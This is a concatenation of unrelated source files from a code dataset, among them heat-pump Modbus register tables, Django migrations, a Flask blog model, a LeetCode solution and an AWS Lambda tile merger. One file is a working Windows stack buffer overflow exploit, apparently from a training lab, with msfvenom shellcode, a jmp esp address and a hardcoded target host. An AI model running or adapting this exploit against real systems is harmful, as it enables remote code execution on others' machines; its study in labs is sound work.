ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_4:
{ KEY_ADDRESS: 242, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_4:
{ KEY_ADDRESS: 243, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_4:
{ KEY_ADDRESS: 244, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_4:
{ KEY_ADDRESS: 245, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_4:
{ KEY_ADDRESS: 246, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_4:
{ KEY_ADDRESS: 247, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5:
{ KEY_ADDRESS: 248, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5:
{ KEY_ADDRESS: 249, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_5:
{ KEY_ADDRESS: 250, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_5:
{ KEY_ADDRESS: 251, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_5:
{ KEY_ADDRESS: 252, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_5:
{ KEY_ADDRESS: 253, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_5:
{ KEY_ADDRESS: 254, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_5:
{ KEY_ADDRESS: 255, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_5:
{ KEY_ADDRESS: 256, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_RETURN_TEMP_FROM_POOL_TO_HEAT_EXCHANGER:
{ KEY_ADDRESS: 299, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_POOL_HYSTERESIS:
{ KEY_ADDRESS: 300, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_FOR_SUPPLY_LINE_TEMP_PASSIVE_COOLING_WITH_MIXING_VALVE_1:
{ KEY_ADDRESS: 302, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SET_POINT_MINIMUM_OUTDOOR_TEMP_WHEN_COOLING_IS_PERMITTED:
{ KEY_ADDRESS: 303, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_EXTERNAL_HEATER_OUTDOOR_TEMP_LIMIT:
{ KEY_ADDRESS: 304, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 305, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_2:
{ KEY_ADDRESS: 306, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 307, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 308, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 309, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_3:
{ KEY_ADDRESS: 310, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 311, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 312, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_4:
{ KEY_ADDRESS: 313, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_4:
{ KEY_ADDRESS: 314, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_4:
{ KEY_ADDRESS: 315, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_TEMP_MIXING_VALVE_4:
{ KEY_ADDRESS: 316, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 317, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_5:
{ KEY_ADDRESS: 318, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 319, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 320, KEY_REG_TYPE: REG_HOLDING, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
}
| 1.820313
| 2
|
src/infrastructure/utils/utils.py
|
YegorMedvedev/python-onion-scaffold
| 1
|
12775565
|
<filename>src/infrastructure/utils/utils.py
import os
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
def get_port() -> int:
assert os.getenv("PORT") is not None
config_port = int(os.getenv("PORT"))
if os.getenv("ENV") == "test":
return config_port + 1000
else:
return config_port
| 2.515625
| 3
|
1-stack-overflows/dostackbufferoverflowgood/exploit.py
|
anvbis/windows-exp
| 0
|
12775566
|
#!/usr/bin/env python3
from pwn import *
padding = b'\x41' * 146
nops = b'\x90' * 128
# msfvenom -p windows/exec -b '\x00\x0a' -f python CMD=calc.exe
shellcode = b""
shellcode += b"\xba\xe8\x19\x31\x9d\xda\xda\xd9\x74\x24\xf4\x5e\x2b"
shellcode += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xe7\xfb"
shellcode += b"\xc4\x61\x1f\x79\x26\x9a\xdf\x1e\xae\x7f\xee\x1e\xd4"
shellcode += b"\xf4\x40\xaf\x9e\x59\x6c\x44\xf2\x49\xe7\x28\xdb\x7e"
shellcode += b"\x40\x86\x3d\xb0\x51\xbb\x7e\xd3\xd1\xc6\x52\x33\xe8"
shellcode += b"\x08\xa7\x32\x2d\x74\x4a\x66\xe6\xf2\xf9\x97\x83\x4f"
shellcode += b"\xc2\x1c\xdf\x5e\x42\xc0\x97\x61\x63\x57\xac\x3b\xa3"
shellcode += b"\x59\x61\x30\xea\x41\x66\x7d\xa4\xfa\x5c\x09\x37\x2b"
shellcode += b"\xad\xf2\x94\x12\x02\x01\xe4\x53\xa4\xfa\x93\xad\xd7"
shellcode += b"\x87\xa3\x69\xaa\x53\x21\x6a\x0c\x17\x91\x56\xad\xf4"
shellcode += b"\x44\x1c\xa1\xb1\x03\x7a\xa5\x44\xc7\xf0\xd1\xcd\xe6"
shellcode += b"\xd6\x50\x95\xcc\xf2\x39\x4d\x6c\xa2\xe7\x20\x91\xb4"
shellcode += b"\x48\x9c\x37\xbe\x64\xc9\x45\x9d\xe2\x0c\xdb\x9b\x40"
shellcode += b"\x0e\xe3\xa3\xf4\x67\xd2\x28\x9b\xf0\xeb\xfa\xd8\x0f"
shellcode += b"\xa6\xa7\x48\x98\x6f\x32\xc9\xc5\x8f\xe8\x0d\xf0\x13"
shellcode += b"\x19\xed\x07\x0b\x68\xe8\x4c\x8b\x80\x80\xdd\x7e\xa7"
shellcode += b"\x37\xdd\xaa\xc4\xd6\x4d\x36\x25\x7d\xf6\xdd\x39"
payload = flat(
padding,
p32(0x080414c3), # jmp esp;
nops, shellcode
)
with remote('192.168.122.186', 31337) as r:
r.writeline(payload)
| 1.554688
| 2
|
main.py
|
enesdemirag/cifar10-classification
| 1
|
12775567
|
<gh_stars>1-10
import os
import warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
warnings.filterwarnings("ignore", category=FutureWarning)
warnings.filterwarnings("ignore", category=UserWarning)
from preprocessing import get_data_from_tensorflow
from models import MLP
import matplotlib.pyplot as plt
import numpy as np
import random
# Preprocessing
images_train, labels_train, images_test, labels_test = get_data_from_tensorflow()
# Creating models
mlp = MLP()
# Training MLP Model
mlp.train(images_train, labels_train)
# Testing MLP Model
loss, precision, recall, accuracy, auc = mlp.test(images_test, labels_test)
_ , ax = plt.subplots(5, 1, figsize=(15, 5))
ax[0].set_xlabel("Epoch")
ax[0].set_ylabel("Value")
ax[0].set_title("Loss")
ax[1].set_xlabel("Epoch")
ax[1].set_ylabel("Value")
ax[1].set_title("Presicion")
ax[2].set_xlabel("Epoch")
ax[2].set_ylabel("Value")
ax[2].set_title("Recall")
ax[3].set_xlabel("Epoch")
ax[3].set_ylabel("Value")
ax[3].set_title("Accuracy")
ax[4].set_xlabel("Epoch")
ax[4].set_ylabel("Value")
ax[4].set_title("AUC")
ax[0].plot(mlp.epochs[1:], mlp.hist["loss"][1:], color="r")
ax[1].plot(mlp.epochs[1:], mlp.hist["precision"][1:], color="g")
ax[2].plot(mlp.epochs[1:], mlp.hist["recall"][1:], color="b")
ax[3].plot(mlp.epochs[1:], mlp.hist["accuracy"][1:], color="k")
ax[4].plot(mlp.epochs[1:], mlp.hist["auc"][1:], color="y")
plt.savefig("finalmodel.png")
plt.show()
mlp.save()
| 2.53125
| 3
|
submissions/bulls-and-cows/solution.py
|
Wattyyy/LeetCode
| 0
|
12775568
|
# https://leetcode.com/problems/bulls-and-cows
class Solution:
def getHint(self, secret, guess):
s_used, g_used = set(), set()
bull = 0
for idx, (s_char, g_char) in enumerate(zip(secret, guess)):
if s_char == g_char:
bull += 1
s_used.add(idx)
g_used.add(idx)
print(s_used)
print(g_used)
cow = 0
for i, s_char in enumerate(secret):
for j, g_char in enumerate(guess):
if (s_char == g_char) and (i not in s_used) and (j not in g_used):
cow += 1
s_used.add(i)
g_used.add(j)
print(s_used)
print(g_used)
return "{}A{}B".format(bull, cow)
| 3.421875
| 3
|
src/travel/migrations/0001_initial.py
|
dakrauth/travel
| 5
|
12775569
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from django.conf import settings
import travel.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TravelBucketList',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100)),
('is_public', models.BooleanField(default=True)),
('description', models.TextField(blank=True)),
('last_update', models.DateTimeField(auto_now=True)),
],
options={
'db_table': 'travel_bucket_list',
},
),
migrations.CreateModel(
name='TravelCurrency',
fields=[
('iso', models.CharField(max_length=4, serialize=False, primary_key=True)),
('name', models.CharField(max_length=50)),
('fraction', models.CharField(max_length=8, blank=True)),
('fraction_name', models.CharField(max_length=15, blank=True)),
('sign', models.CharField(max_length=4, blank=True)),
('alt_sign', models.CharField(max_length=4, blank=True)),
],
options={
'db_table': 'travel_currency',
},
),
migrations.CreateModel(
name='TravelEntity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('geonameid', models.IntegerField(default=0)),
('code', models.CharField(max_length=6, db_index=True)),
('name', models.CharField(max_length=175)),
('full_name', models.CharField(max_length=175)),
('lat', models.DecimalField(null=True, max_digits=7, decimal_places=4, blank=True)),
('lon', models.DecimalField(null=True, max_digits=7, decimal_places=4, blank=True)),
('category', models.CharField(max_length=4, blank=True)),
('locality', models.CharField(max_length=256, blank=True)),
('tz', models.CharField(max_length=40, verbose_name=b'timezone', blank=True)),
('capital', models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='capital_set', blank=True, to='travel.TravelEntity', null=True)),
('continent', models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='continent_set', blank=True, to='travel.TravelEntity', null=True)),
('country', models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='country_set', blank=True, to='travel.TravelEntity', null=True)),
],
options={
'ordering': ('name',),
'db_table': 'travel_entity',
},
),
migrations.CreateModel(
name='TravelEntityInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso3', models.CharField(max_length=3, blank=True)),
('denom', models.CharField(max_length=40, blank=True)),
('denoms', models.CharField(max_length=60, blank=True)),
('language_codes', models.CharField(max_length=100, blank=True)),
('phone', models.CharField(max_length=20, blank=True)),
('electrical', models.CharField(max_length=40, blank=True)),
('postal_code', models.CharField(max_length=60, blank=True)),
('tld', models.CharField(max_length=8, blank=True)),
('population', models.IntegerField(default=None, null=True, blank=True)),
('area', models.IntegerField(default=None, null=True, blank=True)),
('currency', models.ForeignKey(on_delete=django.db.models.SET_NULL, blank=True, to='travel.TravelCurrency', null=True)),
('entity', models.OneToOneField(on_delete=django.db.models.CASCADE, related_name='entityinfo', to='travel.TravelEntity')),
],
options={
'db_table': 'travel_entityinfo',
},
),
migrations.CreateModel(
name='TravelEntityType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('abbr', models.CharField(max_length=4, db_index=True)),
('title', models.CharField(max_length=25)),
],
options={
'db_table': 'travel_entitytype',
},
),
migrations.CreateModel(
name='TravelFlag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('source', models.CharField(max_length=255)),
('base_dir', models.CharField(max_length=8)),
('ref', models.CharField(max_length=6)),
('thumb', models.ImageField(blank=True)),
('large', models.ImageField(blank=True)),
('svg', models.FileField(upload_to=travel.models.svg_upload, blank=True)),
('is_locked', models.BooleanField(default=False)),
],
options={
'db_table': 'travel_flag',
},
),
migrations.CreateModel(
name='TravelLanguage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso639_1', models.CharField(max_length=2, blank=True)),
('iso639_2', models.CharField(max_length=12, blank=True)),
('iso639_3', models.CharField(max_length=3, blank=True)),
('name', models.CharField(max_length=60)),
],
),
migrations.CreateModel(
name='TravelLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('arrival', models.DateTimeField()),
('rating', models.PositiveSmallIntegerField(default=3, choices=[(1, b'★★★★★'), (2, b'★★★★'), (3, b'★★★'), (4, b'★★'), (5, b'★')])),
('notes', models.TextField(blank=True)),
('entity', models.ForeignKey(on_delete=django.db.models.CASCADE, to='travel.TravelEntity')),
('user', models.ForeignKey(on_delete=django.db.models.CASCADE, related_name='travellog_set', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-arrival',),
'get_latest_by': 'arrival',
},
),
migrations.CreateModel(
name='TravelProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('access', models.CharField(default='PRO', max_length=3, choices=[('PUB', b'Public'), ('PRI', b'Private'), ('PRO', b'Protected')])),
('user', models.OneToOneField(on_delete=django.db.models.CASCADE, related_name='travel_profile', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'travel_profile',
},
),
migrations.AddField(
model_name='travelentityinfo',
name='languages',
field=models.ManyToManyField(to='travel.TravelLanguage', blank=True),
),
migrations.AddField(
model_name='travelentityinfo',
name='neighbors',
field=models.ManyToManyField(to='travel.TravelEntity', blank=True),
),
migrations.AddField(
model_name='travelentity',
name='flag',
field=models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='travel.TravelFlag', null=True),
),
migrations.AddField(
model_name='travelentity',
name='state',
field=models.ForeignKey(on_delete=django.db.models.SET_NULL, related_name='state_set', blank=True, to='travel.TravelEntity', null=True),
),
migrations.AddField(
model_name='travelentity',
name='type',
field=models.ForeignKey(on_delete=django.db.models.PROTECT, related_name='entity_set', to='travel.TravelEntityType'),
),
migrations.AddField(
model_name='travelbucketlist',
name='entities',
field=models.ManyToManyField(to='travel.TravelEntity'),
),
migrations.AddField(
model_name='travelbucketlist',
name='owner',
field=models.ForeignKey(on_delete=django.db.models.SET_NULL, default=None, blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
]
| 1.695313
| 2
|
lambda_functions/process/merge_mbtiles/lambda_function.py
|
hotosm/MapCampaigner
| 24
|
12775570
|
import sys
sys.path.insert(0, 'dependencies')
import boto3
import json
import os
import shutil
from glob import glob
from os.path import join
from sqlite3 import connect
S3 = boto3.client('s3')
BUCKET = os.environ['S3_BUCKET']
CAMPAIGN_TILES = 'campaign.mbtiles'
PATH = '/tmp'
def list_mbtiles(uuid):
mbtiles_folder = 'campaigns/{0}/mbtiles/'.format(uuid)
mbtiles = S3.list_objects_v2(
Bucket=BUCKET,
Prefix=mbtiles_folder
)
mbtiles = [m['Key'] for m in mbtiles['Contents']
if m['Key'].endswith('.mbtiles')]
return mbtiles
def merge_tiles(folder_path, merge_file):
mbtiles = glob('{0}/*.mbtiles'.format(folder_path))
mbtile = mbtiles.pop(0)
shutil.copy(mbtile, merge_file)
dst_conn = connect(merge_file)
dst_cursor = dst_conn.cursor()
query = '''INSERT OR REPLACE INTO
tiles(zoom_level, tile_column, tile_row, tile_data)
VALUES (?,?,?,?);'''
for mbtile in mbtiles:
src_conn = connect(mbtile)
src_cursor = src_conn.cursor()
sql_text = 'SELECT * FROM tiles'
src_cursor.execute(sql_text)
row = src_cursor.fetchone()
while row is not None:
dst_cursor.execute(query, row)
row = src_cursor.fetchone()
dst_conn.commit()
def lambda_handler(event, context):
try:
main(event)
except Exception as e:
error_dict = {'function': 'process_merge_mbtiles', 'failure': str(e)}
key = f'campaigns/{event["uuid"]}/failure.json'
S3.put_object(
Bucket=BUCKET,
Key=key,
Body=json.dumps(error_dict),
ACL='public-read')
def main(event):
uuid = event['uuid']
folder_path = join(PATH, uuid)
if os.path.isdir(folder_path):
shutil.rmtree(folder_path)
os.mkdir(folder_path)
# Download all one by one.
for mbtile in list_mbtiles(uuid):
file_name = mbtile.split('/')[-1]
S3.download_file(BUCKET,
mbtile,
join(folder_path, file_name)
)
# Merge using sqlite.
merge_file = join(PATH, CAMPAIGN_TILES)
merge_tiles(folder_path, merge_file)
key = 'campaigns/{0}/{1}'.format(uuid, CAMPAIGN_TILES)
with open(merge_file, "rb") as data:
S3.upload_fileobj(
Fileobj=data,
Bucket=BUCKET,
Key=key,
ExtraArgs={'ACL': 'public-read'}
)
| 2.265625
| 2
|
back-end/app/models.py
|
guguji123/blog
| 0
|
12775571
|
<gh_stars>0
from app.extensions import db
from werkzeug.security import generate_password_hash, check_password_hash
from flask import url_for, current_app
# import base64
from datetime import datetime, timedelta
import jwt
import hashlib
class PaginatedAPIMixin(object):
@staticmethod
def to_collection_dict(query, page, per_page, endpoint, **kwargs):
resources = query.paginate(page, per_page, False)
data = {
'items': [item.to_dict() for item in resources.items],
'_meta': {
'page': page,
'per_page': per_page,
'total_pages': resources.pages,
'total_items': resources.total
},
'_links': {
'self': url_for(endpoint, page=page, per_page=per_page, **kwargs),
'next': url_for(endpoint, page=page + 1, per_page=per_page, **kwargs) if resources.has_next else None,
'prev': url_for(endpoint, page=page - 1, per_page=per_page, **kwargs) if resources.has_prev else None,
}
}
return data
class User(PaginatedAPIMixin, db.Model):
# 设置数据库表名,Post模型中的外键 author_id 会引用 users.id
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
name = db.Column(db.String(64))
location = db.Column(db.String(64))
about_me = db.Column(db.String(64))
member_since = db.Column(db.DateTime(), default=datetime.utcnow)
last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
# token = db.Column(db.String(32), index=True, unique=True)
# token_expiration = db.Column(db.DateTime)
posts = db.relationship('Post', backref='author',
lazy='dynamic', cascade='all, delete-orphan')
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
# 头像
digest = hashlib.md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(digest, size)
# 前段发送来json对象,需要转换成User对象
def from_dict(self, data, new_user=False):
for field in ['username', 'email', 'name', 'location', 'about_me']:
if field in data:
setattr(self, field, data[field])
if new_user and 'password' in data:
self.set_password(data['password'])
def to_dict(self, include_email=False):
data = {
'id': self.id,
'username': self.username,
'name': self.name,
'location': self.location,
'about_me': self.about_me,
'member_since': self.member_since.isoformat() + 'Z',
'last_seen': self.last_seen.isoformat() + 'Z',
'_links': {
'self': url_for('api.get_user', id=self.id),
'avatar': self.avatar(128)
}
}
if include_email:
data['email'] = self.email
return data
'''def get_token(self, expire_in=3600):
now = datetime.utcnow()
if self.token and self.token_expiration > now + timedelta(seconds=60)®:
return self.token
self.token = base64.b64encode(os.urandom(24)).decode('utf-8')
self.token_expiration = now + timedelta(seconds=expire_in)
db.session.add(self)
return self.token'''
'''JWT 没办法回收(不需要 DELETE /tokens),只能等它过期,所以有效时间别设置太长'''
def ping(self):
self.last_seen = datetime.utcnow()
db.session.add(self)
def get_jwt(self, expire_in=600):
now = datetime.utcnow()
payload = {
'user_id': self.id,
'name': self.name if self.name else self.username,
'exp': now + timedelta(seconds=expire_in),
'iat': now
}
return jwt.encode(
payload,
current_app.config['SECRET_KEY'],
algorithm='HS256').decode('utf-8')
@staticmethod
def verify_jwt(token):
try:
payload = jwt.decode(
token,
current_app.config['SECRET_KEY'],
algorithms=['HS256'])
except jwt.exceptions.ExpiredSignatureError as e:
return None
return User.query.get(payload.get('user_id'))
"""
def revoke_token(self):
self.token_expiration = datetime.utcnow() - timedelta(seconds=1)
@staticmethod
def check_token(token):
user = User.query.filter_by(token=token).first()
if user is None or user.token_expiration < datetime.utcnow():
return None
return user
"""
class Post(PaginatedAPIMixin, db.Model):
__tablename__ = 'posts'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
summary = db.Column(db.Text)
body = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
views = db.Column(db.Integer, default=0)
# 外键,评论作者的 id
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
@staticmethod
def on_changed_body(target,value,oldvalue,initiator):
"""
target: 有监听事件发生的 Post 实例对象
value: 监听哪个字段的变化
"""
if not target.summary: #如果前段不填写摘要, 是空str,而不是None
target.summary = value[:200] #截取body 字段的前200个字符给summary
def to_dict(self):
data = {
'id':self.id,
'title':self.title,
'summary':self.summary,
'body':self.body,
'timestamp':self.timestamp,
'views':self.views,
'author':self.author.to_dict(),
'_links':{
'self': url_for('api.get_post',id=self.id),
'author_url':url_for('api.get_user',id = self.author_id)
}
}
return data
def from_dict(self, data):
for field in ['title', 'summary', 'body', 'timestamp', 'views']:
if field in data:
setattr(self, field, data[field])
def __repr__(self):
return '<Post {}>'.format(self.title)
db.event.listen(Post.body,'set',Post.on_changed_body) # body 字段有变化时,执行 on_changed_body() 方法
| 2.21875
| 2
|
cid/__init__.py
|
managedbyq/cid
| 0
|
12775572
|
__version__ = '0.2.2'
default_app_config = 'cid.apps.CidAppConfig'
| 1.125
| 1
|
Python 1/BaskaraMelhorado.py
|
FamousLuisin/Python
| 0
|
12775573
|
<reponame>FamousLuisin/Python
"""Faça um programa que calcule as raizes da equação:
sem raiz: esta equação não possui raízes reais
uma raiz: a raiz desta equação é X ou a raiz dupla desta equação é X
duas raizes: as raízes da equação são X e Y"""
import math
def main():
a = int(input("Digite o valor de a: "))
b = int(input("Digite o valor de b: "))
c = int(input("Digite o valor de c: "))
raiz(a, b, delta(a, b, c))
def delta(a, b, c):
delta = math.pow(b, 2) - 4 * a * c
return delta
def raiz(a, b, delta):
if delta < 0:
print("esta equação não possui raízes reais")
else:
x1 = (-b + math.sqrt(delta)) / (2 * a)
x2 = (-b - math.sqrt(delta)) / (2 * a)
if delta == 0:
print("a raiz desta equação é {}" .format(x1))
else:
if x1 > x2:
print("as raízes da equação são {} e {}" .format(x2, x1))
else:
print("as raízes da equação são {} e {}" .format(x1 , x2))
main()
| 4.0625
| 4
|
kipoi_containers/singularityhandler.py
|
kipoi/kipoi-containers
| 0
|
12775574
|
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Union, List, Type
import os
from ruamel.yaml.scalarstring import DoubleQuotedScalarString
from kipoi_containers.singularityhelper import (
build_singularity_image,
update_existing_singularity_container,
